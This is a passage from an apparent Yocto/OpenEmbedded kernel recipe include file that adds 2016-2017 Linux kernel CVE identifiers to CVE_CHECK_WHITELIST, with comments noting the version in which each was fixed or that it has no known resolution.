1956CVE_CHECK_WHITELIST += "CVE-2016-5696"
1957
1958# fixed-version: Fixed after version 4.7rc1
1959CVE_CHECK_WHITELIST += "CVE-2016-5728"
1960
1961# fixed-version: Fixed after version 4.7rc6
1962CVE_CHECK_WHITELIST += "CVE-2016-5828"
1963
1964# fixed-version: Fixed after version 4.7rc5
1965CVE_CHECK_WHITELIST += "CVE-2016-5829"
1966
1967# CVE-2016-5870 has no known resolution
1968
1969# fixed-version: Fixed after version 4.6rc6
1970CVE_CHECK_WHITELIST += "CVE-2016-6130"
1971
1972# fixed-version: Fixed after version 4.8rc1
1973CVE_CHECK_WHITELIST += "CVE-2016-6136"
1974
1975# fixed-version: Fixed after version 4.7rc7
1976CVE_CHECK_WHITELIST += "CVE-2016-6156"
1977
1978# fixed-version: Fixed after version 4.7
1979CVE_CHECK_WHITELIST += "CVE-2016-6162"
1980
1981# fixed-version: Fixed after version 4.7rc7
1982CVE_CHECK_WHITELIST += "CVE-2016-6187"
1983
1984# fixed-version: Fixed after version 4.6rc1
1985CVE_CHECK_WHITELIST += "CVE-2016-6197"
1986
1987# fixed-version: Fixed after version 4.6
1988CVE_CHECK_WHITELIST += "CVE-2016-6198"
1989
1990# fixed-version: Fixed after version 4.9rc1
1991CVE_CHECK_WHITELIST += "CVE-2016-6213"
1992
1993# fixed-version: Fixed after version 4.6rc1
1994CVE_CHECK_WHITELIST += "CVE-2016-6327"
1995
1996# fixed-version: Fixed after version 4.8rc3
1997CVE_CHECK_WHITELIST += "CVE-2016-6480"
1998
1999# fixed-version: Fixed after version 4.8rc1
2000CVE_CHECK_WHITELIST += "CVE-2016-6516"
2001
2002# Skipping CVE-2016-6753, no affected_versions
2003
2004# fixed-version: Fixed after version 4.0rc1
2005CVE_CHECK_WHITELIST += "CVE-2016-6786"
2006
2007# fixed-version: Fixed after version 4.0rc1
2008CVE_CHECK_WHITELIST += "CVE-2016-6787"
2009
2010# fixed-version: Fixed after version 4.8rc5
2011CVE_CHECK_WHITELIST += "CVE-2016-6828"
2012
2013# fixed-version: Fixed after version 4.9rc4
2014CVE_CHECK_WHITELIST += "CVE-2016-7039"
2015
2016# fixed-version: Fixed after version 4.9rc3
2017CVE_CHECK_WHITELIST += "CVE-2016-7042"
2018
2019# fixed-version: Fixed after version 4.9rc1
2020CVE_CHECK_WHITELIST += "CVE-2016-7097"
2021
2022# fixed-version: Fixed after version 4.6rc1
2023CVE_CHECK_WHITELIST += "CVE-2016-7117"
2024
2025# Skipping CVE-2016-7118, no affected_versions
2026
2027# fixed-version: Fixed after version 4.9rc1
2028CVE_CHECK_WHITELIST += "CVE-2016-7425"
2029
2030# fixed-version: Fixed after version 4.8rc1
2031CVE_CHECK_WHITELIST += "CVE-2016-7910"
2032
2033# fixed-version: Fixed after version 4.7rc7
2034CVE_CHECK_WHITELIST += "CVE-2016-7911"
2035
2036# fixed-version: Fixed after version 4.6rc5
2037CVE_CHECK_WHITELIST += "CVE-2016-7912"
2038
2039# fixed-version: Fixed after version 4.6rc1
2040CVE_CHECK_WHITELIST += "CVE-2016-7913"
2041
2042# fixed-version: Fixed after version 4.6rc4
2043CVE_CHECK_WHITELIST += "CVE-2016-7914"
2044
2045# fixed-version: Fixed after version 4.6rc1
2046CVE_CHECK_WHITELIST += "CVE-2016-7915"
2047
2048# fixed-version: Fixed after version 4.6rc7
2049CVE_CHECK_WHITELIST += "CVE-2016-7916"
2050
2051# fixed-version: Fixed after version 4.5rc6
2052CVE_CHECK_WHITELIST += "CVE-2016-7917"
2053
2054# fixed-version: Fixed after version 4.9
2055CVE_CHECK_WHITELIST += "CVE-2016-8399"
2056
2057# Skipping CVE-2016-8401, no affected_versions
2058
2059# Skipping CVE-2016-8402, no affected_versions
2060
2061# Skipping CVE-2016-8403, no affected_versions
2062
2063# Skipping CVE-2016-8404, no affected_versions
2064
2065# fixed-version: Fixed after version 4.10rc6
2066CVE_CHECK_WHITELIST += "CVE-2016-8405"
2067
2068# Skipping CVE-2016-8406, no affected_versions
2069
2070# Skipping CVE-2016-8407, no affected_versions
2071
2072# fixed-version: Fixed after version 4.9rc4
2073CVE_CHECK_WHITELIST += "CVE-2016-8630"
2074
2075# fixed-version: Fixed after version 4.9rc8
2076CVE_CHECK_WHITELIST += "CVE-2016-8632"
2077
2078# fixed-version: Fixed after version 4.9rc4
2079CVE_CHECK_WHITELIST += "CVE-2016-8633"
2080
2081# fixed-version: Fixed after version 4.10rc8
2082CVE_CHECK_WHITELIST += "CVE-2016-8636"
2083
2084# fixed-version: Fixed after version 4.9rc6
2085CVE_CHECK_WHITELIST += "CVE-2016-8645"
2086
2087# fixed-version: Fixed after version 4.4rc1
2088CVE_CHECK_WHITELIST += "CVE-2016-8646"
2089
2090# fixed-version: Fixed after version 4.9rc7
2091CVE_CHECK_WHITELIST += "CVE-2016-8650"
2092
2093# fixed-version: Fixed after version 4.9rc8
2094CVE_CHECK_WHITELIST += "CVE-2016-8655"
2095
2096# fixed-version: Fixed after version 4.8rc7
2097CVE_CHECK_WHITELIST += "CVE-2016-8658"
2098
2099# CVE-2016-8660 has no known resolution
2100
2101# fixed-version: Fixed after version 4.6rc1
2102CVE_CHECK_WHITELIST += "CVE-2016-8666"
2103
2104# fixed-version: Fixed after version 4.9rc4
2105CVE_CHECK_WHITELIST += "CVE-2016-9083"
2106
2107# fixed-version: Fixed after version 4.9rc4
2108CVE_CHECK_WHITELIST += "CVE-2016-9084"
2109
2110# fixed-version: Fixed after version 4.6rc1
2111CVE_CHECK_WHITELIST += "CVE-2016-9120"
2112
2113# fixed-version: Fixed after version 4.8rc7
2114CVE_CHECK_WHITELIST += "CVE-2016-9178"
2115
2116# fixed-version: Fixed after version 4.10rc4
2117CVE_CHECK_WHITELIST += "CVE-2016-9191"
2118
2119# fixed-version: Fixed after version 4.9rc3
2120CVE_CHECK_WHITELIST += "CVE-2016-9313"
2121
2122# fixed-version: Fixed after version 4.9rc4
2123CVE_CHECK_WHITELIST += "CVE-2016-9555"
2124
2125# fixed-version: Fixed after version 4.9
2126CVE_CHECK_WHITELIST += "CVE-2016-9576"
2127
2128# fixed-version: Fixed after version 4.10rc1
2129CVE_CHECK_WHITELIST += "CVE-2016-9588"
2130
2131# fixed-version: Fixed after version 4.11rc8
2132CVE_CHECK_WHITELIST += "CVE-2016-9604"
2133
2134# Skipping CVE-2016-9644, no affected_versions
2135
2136# fixed-version: Fixed after version 4.6rc1
2137CVE_CHECK_WHITELIST += "CVE-2016-9685"
2138
2139# fixed-version: Fixed after version 4.7rc1
2140CVE_CHECK_WHITELIST += "CVE-2016-9754"
2141
2142# fixed-version: Fixed after version 4.9rc8
2143CVE_CHECK_WHITELIST += "CVE-2016-9755"
2144
2145# fixed-version: Fixed after version 4.9rc7
2146CVE_CHECK_WHITELIST += "CVE-2016-9756"
2147
2148# fixed-version: Fixed after version 4.9rc7
2149CVE_CHECK_WHITELIST += "CVE-2016-9777"
2150
2151# fixed-version: Fixed after version 4.9rc8
2152CVE_CHECK_WHITELIST += "CVE-2016-9793"
2153
2154# fixed-version: Fixed after version 4.7rc1
2155CVE_CHECK_WHITELIST += "CVE-2016-9794"
2156
2157# fixed-version: Fixed after version 4.7rc1
2158CVE_CHECK_WHITELIST += "CVE-2016-9806"
2159
2160# fixed-version: Fixed after version 4.9rc8
2161CVE_CHECK_WHITELIST += "CVE-2016-9919"
2162
2163# Skipping CVE-2017-0403, no affected_versions
2164
2165# Skipping CVE-2017-0404, no affected_versions
2166
2167# Skipping CVE-2017-0426, no affected_versions
2168
2169# Skipping CVE-2017-0427, no affected_versions
2170
2171# CVE-2017-0507 has no known resolution
2172
2173# CVE-2017-0508 has no known resolution
2174
2175# Skipping CVE-2017-0510, no affected_versions
2176
2177# Skipping CVE-2017-0528, no affected_versions
2178
2179# Skipping CVE-2017-0537, no affected_versions
2180
2181# CVE-2017-0564 has no known resolution
2182
2183# fixed-version: Fixed after version 4.12rc1
2184CVE_CHECK_WHITELIST += "CVE-2017-0605"
2185
2186# fixed-version: Fixed after version 4.14rc1
2187CVE_CHECK_WHITELIST += "CVE-2017-0627"
2188
2189# CVE-2017-0630 has no known resolution
2190
2191# CVE-2017-0749 has no known resolution
2192
2193# fixed-version: Fixed after version 4.5rc1
2194CVE_CHECK_WHITELIST += "CVE-2017-0750"
2195
2196# fixed-version: Fixed after version 4.14rc4
2197CVE_CHECK_WHITELIST += "CVE-2017-0786"
2198
2199# fixed-version: Fixed after version 4.15rc3
2200CVE_CHECK_WHITELIST += "CVE-2017-0861"
2201
2202# fixed-version: Fixed after version 4.13rc5
2203CVE_CHECK_WHITELIST += "CVE-2017-1000"
2204
2205# fixed-version: Fixed after version 4.13rc5
2206CVE_CHECK_WHITELIST += "CVE-2017-1000111"
2207
2208# fixed-version: Fixed after version 4.13rc5
2209CVE_CHECK_WHITELIST += "CVE-2017-1000112"
2210
2211# fixed-version: Fixed after version 4.14rc1
2212CVE_CHECK_WHITELIST += "CVE-2017-1000251"
2213
2214# fixed-version: Fixed after version 4.14rc1
2215CVE_CHECK_WHITELIST += "CVE-2017-1000252"
2216
2217# fixed-version: Fixed after version 4.1rc1
2218CVE_CHECK_WHITELIST += "CVE-2017-1000253"
2219
2220# fixed-version: Fixed after version 4.14rc5
2221CVE_CHECK_WHITELIST += "CVE-2017-1000255"
2222
2223# fixed-version: Fixed after version 4.12rc2
2224CVE_CHECK_WHITELIST += "CVE-2017-1000363"
2225
2226# fixed-version: Fixed after version 4.12rc6
2227CVE_CHECK_WHITELIST += "CVE-2017-1000364"
2228
2229# fixed-version: Fixed after version 4.12rc7
2230CVE_CHECK_WHITELIST += "CVE-2017-1000365"
2231
2232# fixed-version: Fixed after version 4.13rc1
2233CVE_CHECK_WHITELIST += "CVE-2017-1000370"
2234
2235# fixed-version: Fixed after version 4.13rc1
2236CVE_CHECK_WHITELIST += "CVE-2017-1000371"
2237
2238# fixed-version: Fixed after version 4.12rc6
2239CVE_CHECK_WHITELIST += "CVE-2017-1000379"
2240
2241# fixed-version: Fixed after version 4.12rc5
2242CVE_CHECK_WHITELIST += "CVE-2017-1000380"
2243
2244# fixed-version: Fixed after version 4.15rc2
2245CVE_CHECK_WHITELIST += "CVE-2017-1000405"
2246
2247# fixed-version: Fixed after version 4.15rc3
2248CVE_CHECK_WHITELIST += "CVE-2017-1000407"
2249
2250# fixed-version: Fixed after version 4.15rc8
2251CVE_CHECK_WHITELIST += "CVE-2017-1000410"
2252
2253# fixed-version: Fixed after version 4.11rc1
2254CVE_CHECK_WHITELIST += "CVE-2017-10661"
2255
2256# fixed-version: Fixed after version 4.12rc1
2257CVE_CHECK_WHITELIST += "CVE-2017-10662"
2258
2259# fixed-version: Fixed after version 4.13rc1
2260CVE_CHECK_WHITELIST += "CVE-2017-10663"
2261
2262# fixed-version: Fixed after version 4.12rc1
2263CVE_CHECK_WHITELIST += "CVE-2017-10810"
2264
2265# fixed-version: Fixed after version 4.12rc7
2266CVE_CHECK_WHITELIST += "CVE-2017-10911"
2267
2268# fixed-version: Fixed after version 4.13rc1
2269CVE_CHECK_WHITELIST += "CVE-2017-11089"
2270
2271# fixed-version: Fixed after version 4.13rc1
2272CVE_CHECK_WHITELIST += "CVE-2017-11176"
2273
2274# fixed-version: Fixed after version 4.12rc1
2275CVE_CHECK_WHITELIST += "CVE-2017-11472"
2276
2277# fixed-version: Fixed after version 4.13rc2
2278CVE_CHECK_WHITELIST += "CVE-2017-11473"
2279
2280# fixed-version: Fixed after version 4.13
2281CVE_CHECK_WHITELIST += "CVE-2017-11600"
2282
2283# fixed-version: Fixed after version 4.13rc6
2284CVE_CHECK_WHITELIST += "CVE-2017-12134"
2285
2286# fixed-version: Fixed after version 4.13rc1
2287CVE_CHECK_WHITELIST += "CVE-2017-12146"
2288
2289# fixed-version: Fixed after version 4.14rc2
2290CVE_CHECK_WHITELIST += "CVE-2017-12153"
2291
2292# fixed-version: Fixed after version 4.14rc1
2293CVE_CHECK_WHITELIST += "CVE-2017-12154"
2294
2295# fixed-version: Fixed after version 4.9rc6
2296CVE_CHECK_WHITELIST += "CVE-2017-12168"
2297
2298# fixed-version: Fixed after version 4.14rc5
2299CVE_CHECK_WHITELIST += "CVE-2017-12188"
2300
2301# fixed-version: Fixed after version 4.14rc5
2302CVE_CHECK_WHITELIST += "CVE-2017-12190"
2303
2304# fixed-version: Fixed after version 4.14rc3
2305CVE_CHECK_WHITELIST += "CVE-2017-12192"
2306
2307# fixed-version: Fixed after version 4.14rc7
2308CVE_CHECK_WHITELIST += "CVE-2017-12193"
2309
2310# fixed-version: Fixed after version 4.13rc4
2311CVE_CHECK_WHITELIST += "CVE-2017-12762"
2312
2313# fixed-version: Fixed after version 4.14rc6
2314CVE_CHECK_WHITELIST += "CVE-2017-13080"
2315
2316# fixed-version: Fixed after version 4.16rc1
2317CVE_CHECK_WHITELIST += "CVE-2017-13166"
2318
2319# fixed-version: Fixed after version 4.5rc4
2320CVE_CHECK_WHITELIST += "CVE-2017-13167"
2321
2322# fixed-version: Fixed after version 4.18rc4
2323CVE_CHECK_WHITELIST += "CVE-2017-13168"
2324
2325# fixed-version: Fixed after version 4.5rc1
2326CVE_CHECK_WHITELIST += "CVE-2017-13215"
2327
2328# fixed-version: Fixed after version 4.15rc8
2329CVE_CHECK_WHITELIST += "CVE-2017-13216"
2330
2331# fixed-version: Fixed after version 3.19rc3
2332CVE_CHECK_WHITELIST += "CVE-2017-13220"
2333
2334# CVE-2017-13221 has no known resolution
2335
2336# CVE-2017-13222 has no known resolution
2337
2338# fixed-version: Fixed after version 4.12rc5
2339CVE_CHECK_WHITELIST += "CVE-2017-13305"
2340
2341# fixed-version: Fixed after version 4.13rc7
2342CVE_CHECK_WHITELIST += "CVE-2017-13686"
2343
2344# CVE-2017-13693 has no known resolution
2345
2346# CVE-2017-13694 has no known resolution
2347
2348# fixed-version: Fixed after version 4.17rc1
2349CVE_CHECK_WHITELIST += "CVE-2017-13695"
2350
2351# fixed-version: Fixed after version 4.3rc1
2352CVE_CHECK_WHITELIST += "CVE-2017-13715"
2353
2354# fixed-version: Fixed after version 4.14rc1
2355CVE_CHECK_WHITELIST += "CVE-2017-14051"
2356
2357# fixed-version: Fixed after version 4.12rc3
2358CVE_CHECK_WHITELIST += "CVE-2017-14106"
2359
2360# fixed-version: Fixed after version 4.13rc6
2361CVE_CHECK_WHITELIST += "CVE-2017-14140"
2362
2363# fixed-version: Fixed after version 4.14rc1
2364CVE_CHECK_WHITELIST += "CVE-2017-14156"
2365
2366# fixed-version: Fixed after version 4.14rc1
2367CVE_CHECK_WHITELIST += "CVE-2017-14340"
2368
2369# fixed-version: Fixed after version 4.14rc3
2370CVE_CHECK_WHITELIST += "CVE-2017-14489"
2371
2372# fixed-version: Fixed after version 4.13
2373CVE_CHECK_WHITELIST += "CVE-2017-14497"
2374
2375# fixed-version: Fixed after version 4.14rc3
2376CVE_CHECK_WHITELIST += "CVE-2017-14954"
2377
2378# fixed-version: Fixed after version 4.14rc2
2379CVE_CHECK_WHITELIST += "CVE-2017-14991"
2380
2381# fixed-version: Fixed after version 4.9rc1
2382CVE_CHECK_WHITELIST += "CVE-2017-15102"
2383
2384# fixed-version: Fixed after version 4.14rc6
2385CVE_CHECK_WHITELIST += "CVE-2017-15115"
2386
2387# fixed-version: Fixed after version 4.2rc1
2388CVE_CHECK_WHITELIST += "CVE-2017-15116"
2389
2390# fixed-version: Fixed after version 3.11rc1
2391CVE_CHECK_WHITELIST += "CVE-2017-15121"
2392
2393# fixed-version: Fixed after version 4.14rc4
2394CVE_CHECK_WHITELIST += "CVE-2017-15126"
2395
2396# fixed-version: Fixed after version 4.13rc5
2397CVE_CHECK_WHITELIST += "CVE-2017-15127"
2398
2399# fixed-version: Fixed after version 4.14rc8
2400CVE_CHECK_WHITELIST += "CVE-2017-15128"
2401
2402# fixed-version: Fixed after version 4.15rc5
2403CVE_CHECK_WHITELIST += "CVE-2017-15129"
2404
2405# fixed-version: Fixed after version 4.14rc5
2406CVE_CHECK_WHITELIST += "CVE-2017-15265"
2407
2408# fixed-version: Fixed after version 4.12rc5
2409CVE_CHECK_WHITELIST += "CVE-2017-15274"
2410
2411# fixed-version: Fixed after version 4.14rc6
2412CVE_CHECK_WHITELIST += "CVE-2017-15299"
2413
2414# fixed-version: Fixed after version 4.14rc7
2415CVE_CHECK_WHITELIST += "CVE-2017-15306"
2416
2417# fixed-version: Fixed after version 4.14rc3
2418CVE_CHECK_WHITELIST += "CVE-2017-15537"
2419
2420# fixed-version: Fixed after version 4.14rc4
2421CVE_CHECK_WHITELIST += "CVE-2017-15649"
2422
2423# fixed-version: Fixed after version 3.19rc3
2424CVE_CHECK_WHITELIST += "CVE-2017-15868"
2425
2426# fixed-version: Fixed after version 4.14rc6
2427CVE_CHECK_WHITELIST += "CVE-2017-15951"
2428
2429# fixed-version: Fixed after version 4.14rc5
2430CVE_CHECK_WHITELIST += "CVE-2017-16525"
2431
2432# fixed-version: Fixed after version 4.14rc4
2433CVE_CHECK_WHITELIST += "CVE-2017-16526"
2434
2435# fixed-version: Fixed after version 4.14rc5
2436CVE_CHECK_WHITELIST += "CVE-2017-16527"
2437
2438# fixed-version: Fixed after version 4.14rc1
2439CVE_CHECK_WHITELIST += "CVE-2017-16528"
2440
2441# fixed-version: Fixed after version 4.14rc4
2442CVE_CHECK_WHITELIST += "CVE-2017-16529"
2443
2444# fixed-version: Fixed after version 4.14rc4
2445CVE_CHECK_WHITELIST += "CVE-2017-16530"
2446
2447# fixed-version: Fixed after version 4.14rc4
2448CVE_CHECK_WHITELIST += "CVE-2017-16531"
2449
2450# fixed-version: Fixed after version 4.14rc5
2451CVE_CHECK_WHITELIST += "CVE-2017-16532"
2452
2453# fixed-version: Fixed after version 4.14rc5
2454CVE_CHECK_WHITELIST += "CVE-2017-16533"
2455
2456# fixed-version: Fixed after version 4.14rc4
2457CVE_CHECK_WHITELIST += "CVE-2017-16534"
2458
2459# fixed-version: Fixed after version 4.14rc6
2460CVE_CHECK_WHITELIST += "CVE-2017-16535"
2461
2462# fixed-version: Fixed after version 4.15rc1
2463CVE_CHECK_WHITELIST += "CVE-2017-16536"
2464
2465# fixed-version: Fixed after version 4.15rc1
2466CVE_CHECK_WHITELIST += "CVE-2017-16537"
2467
2468# fixed-version: Fixed after version 4.16rc1
2469CVE_CHECK_WHITELIST += "CVE-2017-16538"
2470
2471# fixed-version: Fixed after version 4.14rc7
2472CVE_CHECK_WHITELIST += "CVE-2017-16643"
2473
2474# fixed-version: Fixed after version 4.16rc1
2475CVE_CHECK_WHITELIST += "CVE-2017-16644"
2476
2477# fixed-version: Fixed after version 4.14rc6
2478CVE_CHECK_WHITELIST += "CVE-2017-16645"
2479
2480# fixed-version: Fixed after version 4.15rc1
2481CVE_CHECK_WHITELIST += "CVE-2017-16646"
2482
2483# fixed-version: Fixed after version 4.14
2484CVE_CHECK_WHITELIST += "CVE-2017-16647"
2485
2486# fixed-version: Fixed after version 4.15rc1
2487CVE_CHECK_WHITELIST += "CVE-2017-16648"
2488
2489# fixed-version: Fixed after version 4.14
2490CVE_CHECK_WHITELIST += "CVE-2017-16649"
2491
2492# fixed-version: Fixed after version 4.14
2493CVE_CHECK_WHITELIST += "CVE-2017-16650"
2494
2495# fixed-version: Fixed after version 4.15rc4
2496CVE_CHECK_WHITELIST += "CVE-2017-16911"
2497
2498# fixed-version: Fixed after version 4.15rc4
2499CVE_CHECK_WHITELIST += "CVE-2017-16912"
2500
2501# fixed-version: Fixed after version 4.15rc4
2502CVE_CHECK_WHITELIST += "CVE-2017-16913"
2503
2504# fixed-version: Fixed after version 4.15rc4
2505CVE_CHECK_WHITELIST += "CVE-2017-16914"
2506
2507# fixed-version: Fixed after version 4.14rc7
2508CVE_CHECK_WHITELIST += "CVE-2017-16939"
2509
2510# fixed-version: Fixed after version 4.15rc1
2511CVE_CHECK_WHITELIST += "CVE-2017-16994"
2512
2513# fixed-version: Fixed after version 4.15rc5
2514CVE_CHECK_WHITELIST += "CVE-2017-16995"
2515
2516# fixed-version: Fixed after version 4.15rc5
2517CVE_CHECK_WHITELIST += "CVE-2017-16996"
2518
2519# fixed-version: Fixed after version 4.13rc7
2520CVE_CHECK_WHITELIST += "CVE-2017-17052"
2521
2522# fixed-version: Fixed after version 4.13rc7
2523CVE_CHECK_WHITELIST += "CVE-2017-17053"
2524
2525# fixed-version: Fixed after version 4.15rc4
2526CVE_CHECK_WHITELIST += "CVE-2017-17448"
2527
2528# fixed-version: Fixed after version 4.15rc4
2529CVE_CHECK_WHITELIST += "CVE-2017-17449"
2530
2531# fixed-version: Fixed after version 4.15rc4
2532CVE_CHECK_WHITELIST += "CVE-2017-17450"
2533
2534# fixed-version: Fixed after version 4.15rc4
2535CVE_CHECK_WHITELIST += "CVE-2017-17558"
2536
2537# fixed-version: Fixed after version 4.15rc4
2538CVE_CHECK_WHITELIST += "CVE-2017-17712"
2539
2540# fixed-version: Fixed after version 4.15rc5
2541CVE_CHECK_WHITELIST += "CVE-2017-17741"
2542
2543# fixed-version: Fixed after version 4.15rc4
2544CVE_CHECK_WHITELIST += "CVE-2017-17805"
2545
2546# fixed-version: Fixed after version 4.15rc4
2547CVE_CHECK_WHITELIST += "CVE-2017-17806"
2548
2549# fixed-version: Fixed after version 4.15rc3
2550CVE_CHECK_WHITELIST += "CVE-2017-17807"
2551
2552# fixed-version: Fixed after version 4.15rc5
2553CVE_CHECK_WHITELIST += "CVE-2017-17852"
2554
2555# fixed-version: Fixed after version 4.15rc5
2556CVE_CHECK_WHITELIST += "CVE-2017-17853"
2557
2558# fixed-version: Fixed after version 4.15rc5
2559CVE_CHECK_WHITELIST += "CVE-2017-17854"
2560
2561# fixed-version: Fixed after version 4.15rc5
2562CVE_CHECK_WHITELIST += "CVE-2017-17855"
2563
2564# fixed-version: Fixed after version 4.15rc5
2565CVE_CHECK_WHITELIST += "CVE-2017-17856"
2566
2567# fixed-version: Fixed after version 4.15rc5
2568CVE_CHECK_WHITELIST += "CVE-2017-17857"
2569
2570# fixed-version: Fixed after version 4.15rc1
2571CVE_CHECK_WHITELIST += "CVE-2017-17862"
2572
2573# fixed-version: Fixed after version 4.15rc5
2574CVE_CHECK_WHITELIST += "CVE-2017-17863"
2575
2576# fixed-version: Fixed after version 4.15rc5
2577CVE_CHECK_WHITELIST += "CVE-2017-17864"
2578
2579# fixed-version: Fixed after version 4.17rc1
2580CVE_CHECK_WHITELIST += "CVE-2017-17975"
2581
2582# fixed-version: Fixed after version 4.11rc7
2583CVE_CHECK_WHITELIST += "CVE-2017-18017"
2584
2585# fixed-version: Fixed after version 4.15rc7
2586CVE_CHECK_WHITELIST += "CVE-2017-18075"
2587
2588# fixed-version: Fixed after version 4.13rc1
2589CVE_CHECK_WHITELIST += "CVE-2017-18079"
2590
2591# CVE-2017-18169 has no known resolution
2592
2593# fixed-version: Fixed after version 4.7rc1
2594CVE_CHECK_WHITELIST += "CVE-2017-18174"
2595
2596# fixed-version: Fixed after version 4.13rc1
2597CVE_CHECK_WHITELIST += "CVE-2017-18193"
2598
2599# fixed-version: Fixed after version 4.14rc5
2600CVE_CHECK_WHITELIST += "CVE-2017-18200"
2601
2602# fixed-version: Fixed after version 4.15rc2
2603CVE_CHECK_WHITELIST += "CVE-2017-18202"
2604
2605# fixed-version: Fixed after version 4.15rc1
2606CVE_CHECK_WHITELIST += "CVE-2017-18203"
2607
2608# fixed-version: Fixed after version 4.15rc1
2609CVE_CHECK_WHITELIST += "CVE-2017-18204"
2610
2611# fixed-version: Fixed after version 4.15rc2
2612CVE_CHECK_WHITELIST += "CVE-2017-18208"
2613
2614# fixed-version: Fixed after version 4.15rc1
2615CVE_CHECK_WHITELIST += "CVE-2017-18216"
2616
2617# fixed-version: Fixed after version 4.13rc1
2618CVE_CHECK_WHITELIST += "CVE-2017-18218"
2619
2620# fixed-version: Fixed after version 4.12rc4
2621CVE_CHECK_WHITELIST += "CVE-2017-18221"
2622
2623# fixed-version: Fixed after version 4.12rc1
2624CVE_CHECK_WHITELIST += "CVE-2017-18222"
2625
2626# fixed-version: Fixed after version 4.15rc1
2627CVE_CHECK_WHITELIST += "CVE-2017-18224"
2628
2629# fixed-version: Fixed after version 4.16rc1
2630CVE_CHECK_WHITELIST += "CVE-2017-18232"
2631
2632# fixed-version: Fixed after version 4.13rc1
2633CVE_CHECK_WHITELIST += "CVE-2017-18241"
2634
2635# fixed-version: Fixed after version 4.12rc1
2636CVE_CHECK_WHITELIST += "CVE-2017-18249"
2637
2638# fixed-version: Fixed after version 4.11rc1
2639CVE_CHECK_WHITELIST += "CVE-2017-18255"
2640
2641# fixed-version: Fixed after version 4.11rc1
2642CVE_CHECK_WHITELIST += "CVE-2017-18257"
2643
2644# fixed-version: Fixed after version 4.13rc6
2645CVE_CHECK_WHITELIST += "CVE-2017-18261"
2646
2647# fixed-version: Fixed after version 4.14rc3
2648CVE_CHECK_WHITELIST += "CVE-2017-18270"
2649
2650# fixed-version: Fixed after version 4.15rc4
2651CVE_CHECK_WHITELIST += "CVE-2017-18344"
2652
2653# fixed-version: Fixed after version 4.12rc2
2654CVE_CHECK_WHITELIST += "CVE-2017-18360"
2655
2656# fixed-version: Fixed after version 4.14rc3
2657CVE_CHECK_WHITELIST += "CVE-2017-18379"
2658
2659# fixed-version: Fixed after version 4.11rc1
2660CVE_CHECK_WHITELIST += "CVE-2017-18509"
2661
2662# fixed-version: Fixed after version 4.13rc1
2663CVE_CHECK_WHITELIST += "CVE-2017-18549"
2664
2665# fixed-version: Fixed after version 4.13rc1
2666CVE_CHECK_WHITELIST += "CVE-2017-18550"
2667
2668# fixed-version: Fixed after version 4.15rc9
2669CVE_CHECK_WHITELIST += "CVE-2017-18551"
2670
2671# fixed-version: Fixed after version 4.11rc1
2672CVE_CHECK_WHITELIST += "CVE-2017-18552"
2673
2674# fixed-version: Fixed after version 4.15rc6
2675CVE_CHECK_WHITELIST += "CVE-2017-18595"
2676
2677# fixed-version: Fixed after version 4.10rc4
2678CVE_CHECK_WHITELIST += "CVE-2017-2583"
2679
2680# fixed-version: Fixed after version 4.10rc4
2681CVE_CHECK_WHITELIST += "CVE-2017-2584"
2682
2683# fixed-version: Fixed after version 4.11rc1
2684CVE_CHECK_WHITELIST += "CVE-2017-2596"
2685
2686# fixed-version: Fixed after version 4.10rc8
2687CVE_CHECK_WHITELIST += "CVE-2017-2618"
2688
2689# fixed-version: Fixed after version 2.6.25rc1
2690CVE_CHECK_WHITELIST += "CVE-2017-2634"
2691
2692# fixed-version: Fixed after version 4.11rc2
2693CVE_CHECK_WHITELIST += "CVE-2017-2636"
2694
2695# fixed-version: Fixed after version 3.18rc1
2696CVE_CHECK_WHITELIST += "CVE-2017-2647"
2697
2698# fixed-version: Fixed after version 4.11rc6
2699CVE_CHECK_WHITELIST += "CVE-2017-2671"
2700
2701# fixed-version: Fixed after version 4.14rc5
2702CVE_CHECK_WHITELIST += "CVE-2017-5123"
2703
2704# fixed-version: Fixed after version 4.10rc4
2705CVE_CHECK_WHITELIST += "CVE-2017-5546"
2706
2707# fixed-version: Fixed after version 4.10rc5
2708CVE_CHECK_WHITELIST += "CVE-2017-5547"
2709
2710# fixed-version: Fixed after version 4.10rc5
2711CVE_CHECK_WHITELIST += "CVE-2017-5548"
2712
2713# fixed-version: Fixed after version 4.10rc4
2714CVE_CHECK_WHITELIST += "CVE-2017-5549"
2715
2716# fixed-version: Fixed after version 4.10rc4
2717CVE_CHECK_WHITELIST += "CVE-2017-5550"
2718
2719# fixed-version: Fixed after version 4.10rc4
2720CVE_CHECK_WHITELIST += "CVE-2017-5551"
2721
2722# fixed-version: Fixed after version 4.10rc6
2723CVE_CHECK_WHITELIST += "CVE-2017-5576"
2724
2725# fixed-version: Fixed after version 4.10rc6
2726CVE_CHECK_WHITELIST += "CVE-2017-5577"
2727
2728# fixed-version: Fixed after version 4.11rc1
2729CVE_CHECK_WHITELIST += "CVE-2017-5669"
2730
2731# fixed-version: Fixed after version 4.15rc8
2732CVE_CHECK_WHITELIST += "CVE-2017-5715"
2733
2734# fixed-version: Fixed after version 4.15rc8
2735CVE_CHECK_WHITELIST += "CVE-2017-5753"
2736
2737# fixed-version: Fixed after version 4.16rc1
2738CVE_CHECK_WHITELIST += "CVE-2017-5754"
2739
2740# fixed-version: Fixed after version 4.10rc8
2741CVE_CHECK_WHITELIST += "CVE-2017-5897"
2742
2743# fixed-version: Fixed after version 4.11rc1
2744CVE_CHECK_WHITELIST += "CVE-2017-5967"
2745
2746# fixed-version: Fixed after version 4.10rc8
2747CVE_CHECK_WHITELIST += "CVE-2017-5970"
2748
2749# fixed-version: Fixed after version 4.4rc1
2750CVE_CHECK_WHITELIST += "CVE-2017-5972"
2751
2752# fixed-version: Fixed after version 4.10rc8
2753CVE_CHECK_WHITELIST += "CVE-2017-5986"
2754
2755# fixed-version: Fixed after version 4.10rc4
2756CVE_CHECK_WHITELIST += "CVE-2017-6001"
2757
2758# fixed-version: Fixed after version 4.10
2759CVE_CHECK_WHITELIST += "CVE-2017-6074"
2760
2761# fixed-version: Fixed after version 4.10rc8
2762CVE_CHECK_WHITELIST += "CVE-2017-6214"
2763
2764# fixed-version: Fixed after version 4.10
2765CVE_CHECK_WHITELIST += "CVE-2017-6345"
2766
2767# fixed-version: Fixed after version 4.10
2768CVE_CHECK_WHITELIST += "CVE-2017-6346"
2769
2770# fixed-version: Fixed after version 4.11rc1
2771CVE_CHECK_WHITELIST += "CVE-2017-6347"
2772
2773# fixed-version: Fixed after version 4.10
2774CVE_CHECK_WHITELIST += "CVE-2017-6348"
2775
2776# fixed-version: Fixed after version 4.11rc1
2777CVE_CHECK_WHITELIST += "CVE-2017-6353"
2778
